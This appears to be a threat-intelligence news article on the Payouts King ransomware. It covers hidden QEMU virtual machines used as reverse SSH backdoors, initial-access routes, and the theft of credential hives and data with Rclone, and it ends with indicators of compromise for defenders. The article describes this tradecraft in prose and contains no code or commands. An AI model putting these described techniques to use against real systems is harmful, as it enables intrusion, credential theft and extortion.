Payouts King Ransomware
The Payouts King ransomware operation has introduced a highly evasive technique by leveraging QEMU as a reverse SSH backdoor. This approach allows attackers to deploy hidden virtual machines (VMs) directly on compromised systems, effectively bypassing traditional endpoint security controls.
QEMU, an open-source CPU emulator and virtualization platform, enables operating systems to run as virtual machines on a host device. Because most security solutions cannot inspect activity inside these VMs, attackers exploit this blind spot to execute malicious payloads, store harmful data, and establish covert remote access tunnels via SSH connections.
This tactic is not entirely new. Similar abuse of QEMU has been observed in operations linked to groups such as 3AM ransomware group, LoudMiner, and CRON#TRAP phishing campaign.
Table of Contents
Inside the STAC4713 Campaign
Security researchers have identified two major campaigns involving QEMU deployment, with one tracked as STAC4713, first observed in November 2025. This campaign has been directly linked to the Payouts King ransomware operation and attributed to the GOLD ENCOUNTER group.
GOLD ENCOUNTER is known for targeting hypervisors and deploying encryptors in VMware and ESXi environments. Within this campaign, attackers establish persistence and stealth by creating a scheduled task named TPMProfiler, which launches a hidden QEMU virtual machine with SYSTEM-level privileges.
To avoid detection, malicious virtual disk files are disguised as legitimate database and DLL files. Additionally, port forwarding is configured to enable covert access to the infected system through reverse SSH tunnels. The deployed VM runs Alpine Linux 3.22.0 and includes a toolkit of attacker utilities such as AdaptixC2, Chisel, BusyBox, and Rclone.
Initial Access and Exploitation Pathways
Attackers have demonstrated flexibility in gaining initial access, using multiple entry points depending on the target environment. Early incidents involved exposed SonicWall VPN systems, while more recent attacks exploited the CVE-2025-26399 flaw.
Additional intrusion methods observed in subsequent campaigns include:
- Compromise of exposed Cisco SSL VPN services
- Social engineering via Microsoft Teams, where attackers impersonate IT personnel
- Delivery of malicious payloads through Quick Assist
These varied approaches highlight a blend of technical exploitation and human-targeted deception.
Post-Compromise Operations and Data Theft
Once inside a network, attackers employ advanced post-exploitation techniques to extract sensitive data and escalate their foothold. The process typically involves creating shadow copies using VSS (vssuirun.exe), followed by leveraging SMB protocols to copy critical system files such as NTDS.dit, SAM, and SYSTEM registry hives into temporary directories.
In later stages, legitimate binaries like ADNotificationManager.exe are abused to sideload malicious payloads, specifically a Havoc C2 component (vcruntime140_1.dll). Data exfiltration is then conducted using Rclone, transferring stolen information to remote SFTP servers.
Ransomware Capabilities and Encryption Strategy
The Payouts King ransomware strain demonstrates strong technical sophistication. It incorporates extensive obfuscation and anti-analysis techniques to evade detection, while maintaining persistence through scheduled tasks and disabling security tools via low-level system calls.
Its encryption mechanism combines AES-256 in CTR mode with RSA-4096, applying intermittent encryption for larger files to optimize speed and impact. Victims are directed to dark web leak sites through ransom notes, increasing pressure through the threat of data exposure.
Evidence suggests that this ransomware operation may be linked to former affiliates of the Black Basta group, based on overlapping tactics such as spam bombing, phishing via Microsoft Teams, and abuse of remote access tools.
Key Indicators of Compromise to Watch
To defend against this evolving threat, organizations should monitor for the following warning signs:
- Unauthorized installations or execution of QEMU
- Suspicious scheduled tasks running with elevated SYSTEM privileges
- Unusual SSH port forwarding activity
- Outbound SSH tunnels using non-standard ports
Early detection of these indicators can significantly reduce the risk of prolonged compromise and data loss.
